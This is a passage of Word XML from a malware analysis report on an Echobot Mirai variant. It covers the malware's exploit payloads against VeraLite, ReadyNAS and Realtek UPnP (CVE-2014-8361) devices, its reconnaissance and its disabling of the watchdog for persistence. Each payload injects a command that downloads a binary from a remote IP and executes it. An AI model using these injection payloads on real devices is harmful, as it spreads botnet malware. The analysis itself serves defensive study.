              <w:t>DeviceNum</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AB1DBA">
              <w:t>&gt; &lt;Code&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AB1DBA">
              <w:t>os.execute</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AB1DBA">
              <w:t>(cd /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AB1DBA">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AB1DBA">
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AB1DBA">
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AB1DBA">
              <w:t xml:space="preserve"> http://80.82.67.184/richard; curl -O http://80.82.67.184/richard; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AB1DBA">
              <w:t>chmod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AB1DBA">
              <w:t xml:space="preserve"> +x </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AB1DBA">
              <w:t>richard</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AB1DBA">
              <w:t>; ./</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AB1DBA">
              <w:t>richard</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AB1DBA">
              <w:t>)&lt;/Code&gt; &lt;/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AB1DBA">
              <w:t>u:RunLua</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AB1DBA">
              <w:t>&gt;&lt;/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AB1DBA">
              <w:t>s:Body</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AB1DBA">
              <w:t>&gt;&lt;/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AB1DBA">
              <w:t>s:Envelope</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AB1DBA">
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15CF87D9" w14:textId="4E143E3E" w:rsidR="00972FBC" w:rsidRDefault="00AB3D0D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D0D">
              <w:t>MiCasaVerde</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AB3D0D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AB3D0D">
              <w:t>VeraLite</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AB3D0D">
              <w:t xml:space="preserve"> 1.5.408</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D75AA" w14:paraId="1CF18968" w14:textId="559B5BBC" w:rsidTr="0069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40302AD" w14:textId="4AFE0B9C" w:rsidR="00972FBC" w:rsidRPr="00D20D25" w:rsidRDefault="00B36C08" w:rsidP="00B06445">
            <w:r>
              <w:t>NETGEAR_READYNAS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="128A7C58" w14:textId="2526E143" w:rsidR="00972FBC" w:rsidRDefault="00E103F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65D0F91C" w14:textId="51A375FE" w:rsidR="00972FBC" w:rsidRDefault="0097436C" w:rsidP="00A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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>upgrade_handle.php?cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>writeuploaddir&amp;uploaddir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=%</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>27;cd</w:t>
            </w:r>
            <w:proofErr w:type="gram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 xml:space="preserve">; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> http://80.82.67.184/richard; curl -O http://80.82.67.184/richard;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richard</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>; ./richard%205;%27 HTTP/1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="441B1536" w14:textId="266DFD14" w:rsidR="00972FBC" w:rsidRDefault="00836A0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gear</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ReadyNAS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00991BE5">
              <w:t xml:space="preserve"> surveillance</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> devices</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D75AA" w14:paraId="1DC8447A" w14:textId="665D4D7C" w:rsidTr="00696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8F1EF16" w14:textId="4A259465" w:rsidR="00972FBC" w:rsidRPr="00D20D25" w:rsidRDefault="00B25C3A" w:rsidP="00B06445">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
            <w:r w:rsidR="00972FBC" w:rsidRPr="00D20D25">
              <w:t>_2014_8361</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="646DDDDB" w14:textId="1284E590" w:rsidR="00972FBC" w:rsidRDefault="00E103F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604" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AD9C57B" w14:textId="77777777" w:rsidR="00972FBC" w:rsidRDefault="00E33C1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C1A">
              <w:t>POST /wanipcn.xml HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65E5039B" w14:textId="37C693D5" w:rsidR="00E96CE3" w:rsidRDefault="00E96CE3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CE3">
              <w:t>&lt;?xml version="1.0"?&gt;&lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E96CE3">
              <w:t>SOAP-ENV:Envelope</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E96CE3">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E96CE3">
              <w:t>xmlns:SOAP-ENV</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E96CE3">
              <w:t>="http://schemas.xmlsoap.org/soap/envelope" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"&gt;&lt;SOAP-ENV:Body&gt;&lt;m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"&gt;&lt;NewPortMappingDescription&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00E96CE3">
              <w:lastRenderedPageBreak/>
              <w:t>&lt;/NewPortMappingDescription&gt;&lt;NewLeaseDuration&gt;&lt;/NewLeaseDuration&gt;&lt;NewInternalClient&gt;cd /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E96CE3">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E96CE3">
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E96CE3">
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E96CE3">
              <w:t xml:space="preserve"> http://80.82.67.184/richard; curl -O http://80.82.67.184/richard; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E96CE3">
              <w:t>chmod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E96CE3">
              <w:t xml:space="preserve"> +x </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E96CE3">
              <w:t>richard</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E96CE3">
              <w:t>; ./richard&lt;/NewInternalClient&gt;&lt;NewEnabled&gt;1&lt;/NewEnabled&gt;&lt;NewExternalPort&gt;634&lt;/NewExternalPort&gt;&lt;NewRemoteHost&gt;&lt;/NewRemoteHost&gt;&lt;NewProtocol&gt;TCP&lt;/NewProtocol&gt;&lt;NewInternalPort&gt;45&lt;/NewInternalPort&gt;&lt;/m:AddPortMapping&gt;&lt;/SOAP-ENV:Body&gt;&lt;/SOAP-ENV:Envelope&gt;"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24727CA5" w14:textId="10022B6B" w:rsidR="00972FBC" w:rsidRDefault="00E72C0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altek SDK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A44627F" w14:textId="0B67300F" w:rsidR="00F71DCF" w:rsidRDefault="00F71DCF" w:rsidP="00F71DCF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc101201917"/>
      <w:r>
        <w:t>Maintaining persistence</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="7BA5BE25" w14:textId="5447899C" w:rsidR="00FD7B86" w:rsidRDefault="00FC35E2" w:rsidP="00190AD4">
      <w:r>
        <w:t>As many IoT Devices use different hardware such as ARM, MIPS o</w:t>
      </w:r>
      <w:r w:rsidR="006E1DAF">
        <w:t xml:space="preserve">r SPARCE, the Echobot </w:t>
      </w:r>
      <w:r w:rsidR="00A2725B">
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="006E1DAF">
        <w:t>irai variant tries to gather information on</w:t>
      </w:r>
      <w:r w:rsidR="00D434BD">
        <w:t xml:space="preserve"> these </w:t>
      </w:r>
      <w:r w:rsidR="001A4B98">
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidR="006E1DAF">
        <w:t xml:space="preserve"> devices before infecting them. </w:t>
      </w:r>
      <w:r w:rsidR="00EA6816">
        <w:t xml:space="preserve">This malware sample uses </w:t>
      </w:r>
      <w:r w:rsidR="005F3A16">
        <w:t>multiple shell commands</w:t>
      </w:r>
      <w:r w:rsidR="001361AE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA6816">
        <w:t>for s</w:t>
      </w:r>
      <w:r w:rsidR="001361AE">
        <w:t xml:space="preserve">ystem scanning </w:t>
      </w:r>
      <w:r w:rsidR="005F3A16">
        <w:t>before trying to maintain persistence.</w:t>
      </w:r>
      <w:r w:rsidR="004951C8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAC89E1" w14:textId="0DF5040E" w:rsidR="001361AE" w:rsidRDefault="004951C8" w:rsidP="00190AD4">
      <w:r>
        <w:t>Some</w:t>
      </w:r>
      <w:r w:rsidR="003A5E89">
        <w:t xml:space="preserve"> shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> commands we noticed were</w:t>
      </w:r>
      <w:r w:rsidR="00FD7B86">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A5E89">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A5E89">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, cat, </w:t>
      </w:r>
      <w:r w:rsidR="004B39D7" w:rsidRPr="003A5E89">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ls,</w:t>
      </w:r>
      <w:r w:rsidR="004F30D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00940E54">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D910E0" w14:textId="77777777" w:rsidR="007F7C3F" w:rsidRDefault="003A5E89" w:rsidP="00190AD4">
      <w:r>
        <w:t xml:space="preserve">The malware also tries to examine more about target platforms by gathering information about CPU cores and information in </w:t>
      </w:r>
      <w:r w:rsidRPr="008F2C9E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/proc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F2C9E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cpuinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and CPU usage in </w:t>
      </w:r>
      <w:r w:rsidRPr="008F2C9E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/proc/stat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8594D9" w14:textId="0D2EE539" w:rsidR="003A5E89" w:rsidRDefault="007F7C3F" w:rsidP="00190AD4">
      <w:r>
        <w:t xml:space="preserve">When analyzing the malware dynamically via strace and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zelos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> some information gathering </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>syscalls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> were found:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1C7E3E" w14:textId="0AAC7DD1" w:rsidR="007F7C3F" w:rsidRPr="007F7C3F" w:rsidRDefault="00681AA6" w:rsidP="007F7C3F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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g</w:t>
      </w:r>
      <w:r w:rsidR="007F7C3F" w:rsidRPr="007F7C3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>etsockopt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007F7C3F" w:rsidRPr="007F7C3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etsockname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="007F7C3F" w:rsidRPr="007F7C3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007F7C3F" w:rsidRPr="007F7C3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>gettimeofday</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007F7C3F" w:rsidRPr="007F7C3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007F7C3F" w:rsidRPr="007F7C3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>getppid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="197BCE1C" w14:textId="5EE847BF" w:rsidR="00885E4E" w:rsidRDefault="00885E4E" w:rsidP="00190AD4">
      <w:r>
        <w:t xml:space="preserve">Other functions found in the </w:t>
      </w:r>
      <w:r w:rsidR="00BC51D0">
        <w:t>malware’s non-stripped binary include</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5B3E41" w14:textId="561BB6B5" w:rsidR="00885E4E" w:rsidRDefault="00885E4E" w:rsidP="00885E4E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F5305F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>fstat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F5305F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F5305F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>) –</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> To return information on files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003D17D2" w14:textId="6787E1B0" w:rsidR="00885E4E" w:rsidRDefault="00885E4E" w:rsidP="00885E4E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F5305F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>getpage</w:t>
      </w:r>
      <w:r w:rsidR="00F05DF6" w:rsidRPr="00F5305F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F5305F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F5305F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00980A0F">
        <w:t>Returns kernel symbol PAGE_SIZE which is dependent on architecture and machine model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EA0589" w14:textId="7FB34EB1" w:rsidR="00F5305F" w:rsidRDefault="000B6330" w:rsidP="000B6330">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1305"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To maintain persistence, </w:t>
      </w:r>
      <w:r w:rsidR="00DF2386">
        <w:t xml:space="preserve">this Echobot </w:t>
      </w:r>
      <w:r w:rsidR="000963FA">
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00DF2386">
        <w:t xml:space="preserve">irai variant will try to disable the </w:t>
      </w:r>
      <w:r w:rsidR="00DF2386" w:rsidRPr="00C4486A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>watchdog process</w:t>
      </w:r>
      <w:r w:rsidR="00DF2386">
        <w:t xml:space="preserve"> in infected IoT devices.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00365659">
        <w:t>The watchdog proces</w:t>
      </w:r>
      <w:r w:rsidR="00C4486A">
        <w:t>s is used in embedded systems to monitor if a system is running</w:t>
      </w:r>
      <w:r w:rsidR="00321301">
        <w:t xml:space="preserve"> and will reboot hanged systems by default due to unrecoverable software errors</w:t>
      </w:r>
      <w:r w:rsidR="0031220A">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004C2EA2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0031220A">
        <w:t>The system would then boot back into a clean state</w:t>
      </w:r>
      <w:r w:rsidR="00321301">
        <w:t>. This will in turn remove the malware</w:t>
      </w:r>
      <w:r w:rsidR="00205CE7">
        <w:t xml:space="preserve"> which many attackers do not want.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700A8BEA" w14:textId="1CDED743" w:rsidR="00205CE7" w:rsidRDefault="003573D3" w:rsidP="000B6330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819368" wp14:editId="0FFC0352">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>942975</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5715</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4114800" cy="1822450"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:wrapSquare wrapText="bothSides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A06BE" w14:textId="51E65B18" w:rsidR="00FE1794" w:rsidRDefault="00FE1794" w:rsidP="00190AD4"/>
    <w:p w14:paraId="0D4188D4" w14:textId="3241383D" w:rsidR="003573D3" w:rsidRDefault="003573D3" w:rsidP="00413A6D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B174452" w14:textId="5EE8F62E" w:rsidR="003573D3" w:rsidRDefault="003573D3" w:rsidP="00190AD4"/>
    <w:p w14:paraId="2A3927DE" w14:textId="5DD340F8" w:rsidR="003573D3" w:rsidRDefault="003573D3" w:rsidP="00190AD4"/>
    <w:p w14:paraId="0C706188" w14:textId="122E075D" w:rsidR="003573D3" w:rsidRDefault="003573D3" w:rsidP="00190AD4"/>
    <w:p w14:paraId="0ADD3CA7" w14:textId="1718A1D8" w:rsidR="003573D3" w:rsidRDefault="003573D3" w:rsidP="00190AD4"/>
    <w:p w14:paraId="32900C86" w14:textId="5C1EAEEB" w:rsidR="0086428A" w:rsidRPr="001F4F1E" w:rsidRDefault="00413A6D" w:rsidP="00413A6D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r w:rsidR="0086428A" w:rsidRPr="00D71622">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="0086428A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="0086428A" w:rsidRPr="00D71622">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0086428A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="0086428A" w:rsidRPr="00D71622">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="0086428A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Prevention of watchdog process</w:t>
      </w:r>
      <w:r w:rsidR="00A11554">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> rebooting in infected devices </w:t>
      </w:r>
      <w:r w:rsidR="0086428A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="00A11554">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> both</w:t>
      </w:r>
      <w:r w:rsidR="0086428A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Mirai and Echobot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743998EA" w14:textId="699F6123" w:rsidR="00EE6C41" w:rsidRDefault="00656451" w:rsidP="00656451">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1260"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">When analyzing the malware’s system calls dynamically via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zelos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we </w:t>
      </w:r>
      <w:r w:rsidR="00816865">
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> see the malware trying to </w:t>
      </w:r>
      <w:r w:rsidR="00E90805">
        <w:t>open</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the watchdog process in both </w:t>
      </w:r>
      <w:r w:rsidRPr="00656451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/watchdog </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidRPr="00656451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00656451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>misc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00656451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/watchdog</w:t>
      </w:r>
      <w:r w:rsidR="00E90805">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E90805">
        <w:t>to prevent watchdog from rebooting devices</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308FA01F" w14:textId="4E843234" w:rsidR="00816865" w:rsidRDefault="00816865" w:rsidP="00656451">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1260"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44BCF72E" wp14:editId="0E25FBD0">
            <wp:extent cx="5943600" cy="767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BFCB" w14:textId="5DCCEF2F" w:rsidR="00656451" w:rsidRPr="006057D2" w:rsidRDefault="000262A5" w:rsidP="006057D2">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">                      </w:t>
      </w:r>
      <w:r w:rsidR="00656451" w:rsidRPr="00D71622">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00656451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00656451" w:rsidRPr="00D71622">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00656451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00656451" w:rsidRPr="00D71622">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00656451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Prevention of watchdog process rebooting seen in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EE6C41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Z</w:t>
      </w:r>
      <w:r w:rsidR="00656451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>elos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
